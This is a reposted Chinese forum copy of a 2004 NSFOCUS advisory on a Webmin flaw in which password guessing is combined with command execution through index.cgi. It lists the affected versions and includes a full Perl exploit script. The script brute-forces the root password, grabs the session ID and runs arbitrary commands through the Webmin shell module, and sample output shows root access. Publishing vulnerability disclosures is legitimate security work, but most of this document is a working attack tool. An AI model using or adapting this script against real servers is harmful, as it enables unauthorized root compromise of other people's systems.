[转载]Webmin暴力猜测任意命令执行漏洞
信息来源:nsfocus发布日期:2004-12-22
更新日期:2004-12-23
受影响系统:
Webmin Webmin 1.150
Webmin Webmin 1.140
Webmin Webmin 1.130
Webmin Webmin 1.121
Webmin Webmin 1.110
Webmin Webmin 1.09
Webmin Webmin 1.08
Webmin Webmin 1.07
Webmin Webmin 1.06
Webmin Webmin 1.05
Webmin Webmin 1.02
Webmin Webmin 1.0
描述:
--------------------------------------------------------------------------------
Webmin是一款基于WEB的Unix和Linux操作系统系统管理接口。
Webmin包含的index.cgi脚本存在安全问题,远程攻击者可以利用这个漏洞以进程权限执行任意命令。
Webmin允许暴力多次猜测帐户进行登录,并由于index.cgi对用户提交的参数缺少充分过滤,可导致以进程权限在系统上执行任意命令。
<*来源:Di42lo ([email]DiAblo_2@012.net.il[/email])
链接:[url]http://marc.theaimsgroup.com/?l=bugtraq&m=110375218504126&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Di42lo ([email]DiAblo_2@012.net.il[/email])提供了如下测试方法:
[code]#!/usr/bin/perl
##
# Webmin BruteForce + Command execution - By Di42lo <[email]DiAblo_2@012.net.il[/email]>
#
# usage
# ./bruteforce.webmin.pl <host> <command>
#
#./bruteforce.webmin.pl 192.168.0.5 "uptime"
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01
use IO::Socket;
if (@ARGV<2){ print "Webmin BruteForcer\nusage:\n$0 <host> <command>\n"; exit; }
my $host=$ARGV[0];
my $cmd=$ARGV[1];
#start pass:
my $pass="a";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => \
"10000") || die "[-] Webmin on this host does not exist\r\n"; $sock->close;
print "[+] BruteForcing...\n";
my $sid;
while ($chk!=1) {
$pass++;
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: [url]http://$host:10000/[/url]\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => \
"10000"); if ($sock)
{
print "[+] trying to enter with: $pass\n";
print $sock $buffer;
while ($answer=<$sock>)
{
if ($answer=~/sid=(.*);/g)
{
$chk=1;
$sid=$1;
print "[+] Found SID : $sid\n";
print "[+] Password : $pass\n";
}
}
}
$sock->close;
}
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => \
"10000") || die "[-] Cant Connect once again for command execution\n"; print "[+] \
Connected.. Sending Buffer\n"; my \
$temp="-----------------------------19777347561180971495777867604\n". \
"Content-Disposition: form-data; name=\"cmd\"\n". "\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: [url]http://$host:10000/shell/[/url]\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data; \
boundary=---------------------------19777347561180971495777867604\n". \
"Content-Length: siz\n". "\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock)
{
print "[+] Buffer sent...running command $cmd\n";
print $sock $buffer;
while ($answer=<$sock>)
{
#print $answer;
if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
if ($answer=~/<td><pre><b>>/g)
{
$cmd_chk=1;
}
if ($cmd_chk==1)
{
if ($answer=~/<\/pre><\/td><\/tr>/g)
{
exit;
} else { print $answer; }
}
}
}[/code]
页:
[1]